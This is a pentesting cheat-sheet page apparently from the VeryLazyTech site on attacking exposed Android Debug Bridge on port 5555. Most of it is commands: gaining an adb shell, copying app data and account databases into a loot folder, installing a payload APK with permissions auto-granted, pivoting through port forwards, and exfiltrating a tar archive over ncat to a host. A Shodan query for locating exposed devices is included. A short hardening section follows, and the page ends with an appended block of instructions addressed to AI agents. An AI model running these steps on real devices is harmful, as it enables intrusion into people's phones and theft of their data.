# Android Debug Bridge (ADB) - PORT 5555 {% tabs %} {% tab title="Support VeryLazyTech ๐ŸŽ‰" %} * Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! ๐ŸŽ** * **Follow** us on: * **โœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **๐Ÿ‘พ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **๐Ÿ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **๐Ÿ“บ YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **๐Ÿ“ฉ Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **๐Ÿ•ต๏ธโ€โ™‚๏ธ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses. ๐Ÿ“š {% endtab %} {% endtabs %} ## Basic Info * **Default legacy port:** `5555/tcp` (classic `adb tcpip` mode). Modern Android (11+) uses TLS pairing and mDNS โ€” ports are dynamic. * If you can reach `adbd` you can often get a shell (`adb shell`), install APKs, steal app data, and pivot. * **High risk:** any reachable adbd (TCP) should be treated as compromise-level. Block it and monitor mDNS records. ### What is ADB? ADB (Android Debug Bridge) is a command-line tool to communicate with Android devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device. Modern wireless debugging (Android 11+) adds TLS pairing and mDNS discovery โ€” which changes the offensive surface: ports are discovered via mDNS and pairing is required for secure connections. **Nmap fingerprint** (legacy): ``` PORT STATE SERVICE VERSION 5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909) ``` *** ## Enumeration ### Quick Recon & Connect If you find ADB exposed and reachable, act fast โ€” many devices are ephemeral or reboot into safe modes. ```bash # Classic connect (legacy adb tcpip mode) adb connect [:] # default port 5555 adb devices -l # ensure device shows as "device" adb shell # interactive shell (usually uid `shell`) whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port adb root || true # works on eng/userdebug/insecure builds, many emulators/IoT ``` * If `ro.adb.secure=1` (ADB auth), you need to be pre-authorized or use Android 11+ pairing flow. * Many vendor engineering images, devkits, emulators, TVs, STBs run `adbd` without auth or as root. *** ## Quick Postโ€‘Exploitation Checklist 1. **Validate privileges & context** ```bash id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint ``` 2. **Enumerate apps & locate data** ```bash pm list packages -3 # third-party packages pm path # path to apk # For debuggable apps without root run-as sh -c 'cd /data/data/ && tar cf - .' | tar xf - -C ./loot/ # With root cp -a /data/data/ /sdcard/ exit adb pull "/sdcard/" # pull files to host ``` **Artifacts of interest (root required):** * `/data/system/users/0/accounts.db` (AccountManager) * `/data/misc/wifi/` (saved networks / keys on older versions) * App SQLite DBs and `shared_prefs` under `/data/data/` > Note: Chrome and some apps encrypt or use OS-level protections โ€” treat with care and follow legal/ethical rules. *** ## Code Execution & Payload Delivery * Install and autoโ€‘grant runtime permissions: ```bash adb install -r -g payload.apk # -g grants runtime perms in manifest adb shell monkey -p -c android.intent.category.LAUNCHER 1 ``` * Directly start components: ```bash adb shell am start -n / adb shell am startservice -n / adb shell am broadcast -a ``` *** ## Port Forwarding & Pivoting Even without root, ADB is a great pivoting tool: ```bash # Host -> device (access device-local service from host) adb forward tcp:2222 tcp:22 adb forward tcp:8081 tcp:8080 # Device -> host (device can reach host services) adb reverse tcp:1080 tcp:1080 ``` **File exfil over sockets (no sdcard writes):** ```bash # On host: ncat -lvp 9000 > dump.tar # On device (root or run-as as applicable): adb shell "tar cf - /data/data/" | ncat 9000 ``` *** ## Wireless Debugging (Android 11+) Android 11+ uses TLS-protected wireless debugging with device-side pairing and mDNS discovery: ```bash # On device: Developer options -> Wireless debugging -> Pair device # On attacker host (same L2 network, mDNS allowed): adb pair : # enter 6-digit code shown on device adb mdns services # discover _adb-tls-connect._tcp / _adb._tcp adb connect : ``` **mDNS service names:** * `_adb-tls-pairing._tcp` (pairing) * `_adb-tls-connect._tcp` (paired connect) * `_adb._tcp` (legacy/plain) Notes: * Ports are dynamic โ€” donโ€™t assume `5555`. * If mDNS is filtered, legacy `adb tcpip 5555` (USB-assisted) may still enable legacy mode until reboot. * Attackers with UI access or an MDM misconfig can enable wireless debugging and view pairing codes โ€” establishing long-lived access. *** ## Hardening & Detection (Defender Playbook) Assume any reachable `adbd` is a highโ€‘severity risk. **Immediate hardening steps:** ```bash # On device under your control settings put global adb_enabled 0 setprop service.adb.tcp.port -1 # disable TCP listening (or: adb usb) stop adbd; start adbd # restart daemon ``` **Network & monitoring:** * Block inbound `TCP/5555` and ADB-related dynamic ports on untrusted segments. * Block or monitor mDNS records: `_adb._tcp`, `_adb-tls-connect._tcp`, `_adb-tls-pairing._tcp`. * Inventory devices for insecure builds: check `getprop ro.debuggable`, `ro.build.type`, `ro.adb.secure`. * Revoke USB debugging authorizations in Developer options for managed devices. *** ## Shodan Search ``` "android debug bridge" port:5555 product:"Android Debug Bridge" ``` {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://whop.com/verylazytech/)
Support VeryLazyTech ๐ŸŽ‰ * Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! ๐ŸŽ** * **Follow** us on: * **โœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **๐Ÿ‘พ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **๐Ÿ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **๐Ÿ“บ YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **๐Ÿ“ฉ Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **๐Ÿ•ต๏ธโ€โ™‚๏ธ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses. ๐Ÿ“š
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/android-debug-bridge-adb-port-5555.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.